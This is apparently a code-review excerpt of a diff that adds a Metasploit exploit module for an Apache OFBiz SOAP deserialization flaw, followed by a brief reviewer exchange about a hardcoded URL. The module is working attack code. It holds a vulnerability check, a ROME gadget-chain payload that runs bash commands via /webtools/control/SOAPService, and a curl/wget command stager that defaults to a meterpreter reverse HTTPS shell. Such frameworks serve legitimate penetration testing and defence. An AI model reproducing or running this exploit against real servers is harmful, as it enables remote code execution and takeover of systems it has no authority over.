modules/exploits/linux/http/apache_ofbiz_deserialization_soap.rb

```diff
@@ -0,0 +1,162 @@
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => %i[bourne curl wget],
+              'DefaultOptions' => {
+                'CMDSTAGER::FLAVOR' => :curl,
+                'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'DefaultOptions' => {
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(8443),
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    # Send an empty serialized object
+    res = send_request_soap('')
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check.')
+    end
+
+    messages = {}
+    res.get_xml_document.xpath('//soapenv:Envelope/soapenv:Body/serResponse:serResponse/serResponse:map-HashMap/serResponse:map-Entry', XML_NS).each do |entry|
+      key = entry.xpath('serResponse:map-Key/serResponse:std-String/@value', XML_NS).to_s
+      messages[key] = entry.xpath('serResponse:map-Value/serResponse:std-String/@value', XML_NS).to_s
+    end
+
+    if messages['errorMessage']&.start_with?('Problem deserializing object from byte array')
+      return CheckCode::Vulnerable('Target can deserialize arbitrary data.')
+    end
+
+    CheckCode::Safe('Target cannot deserialize arbitrary data.')
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    vprint_status("Executing command: #{cmd}")
+
+    res = send_request_soap(
+      # framework/webapp/lib/rome-0.9.jar
+      generate_java_deserialization_for_command('ROME', 'bash', cmd)
+    )
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
+    end
+
+    print_good("Successfully executed command: #{cmd}")
+  end
+
+  def send_request_soap(data)
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/webtools/control/SOAPService'),
+      'ctype' => 'text/xml',
+      'data' => <<~XML
+        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+          <soapenv:Header/>
+          <soapenv:Body>
+            <ser>
+              <map-HashMap>
+                <map-Entry>
+                  <map-Key>
+                    <cus-obj>#{Rex::Text.to_hex(data, '')}</cus-obj>
+                  </map-Key>
+                  <map-Value>
+                    <std-String value="http://baidu.com"/>
```

Comment:
I forgot that I should randomize this.

Reply:
You could make it `https://www.metasploit.com/`. :trollface: